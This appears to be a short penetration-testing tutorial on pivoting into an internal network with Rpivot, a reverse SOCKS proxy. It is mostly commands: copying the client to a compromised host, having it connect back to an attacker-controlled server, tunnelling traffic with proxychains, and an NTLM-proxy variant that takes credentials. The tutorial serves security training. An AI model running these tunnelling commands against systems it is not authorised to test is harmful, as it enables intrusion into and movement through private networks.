Web Server Pivoting with Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a network to and external server and exposes the client's local port on the server-side.

Clone Rpivot

attacker@kali$ git clone https://github.com/klsecservices/rpivot.git

Running server.py from the Attack Host

attacker@kali$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

We need to transfer the client.py to the target.

attacker@kali$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target (python2.7 required)

victim@ubuntu:~/rpivot$ python2.7 client.py --server-ip <attacker-ip> --server-port 9999

We can configure proxychains to pivot over our local server on localhost:9050 that was started by the Rpivot python server.

proxychains firefox-esr 172.16.5.135:80

Some organizations have HTTP-proxy with NTLM authentication configured with the Domain Controller. In such cases, we can provide an additional NTLM authentication option to rpivot. We do so by providing the username and password via the NTLMproxy.

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Proxy Authentication using NTLM:

https://learn.microsoft.com/en-us/openspecs/office_protocols/ms-grvhenc/b9e676e7-e787-4020-9840-7cfe7c76044a\

Last updated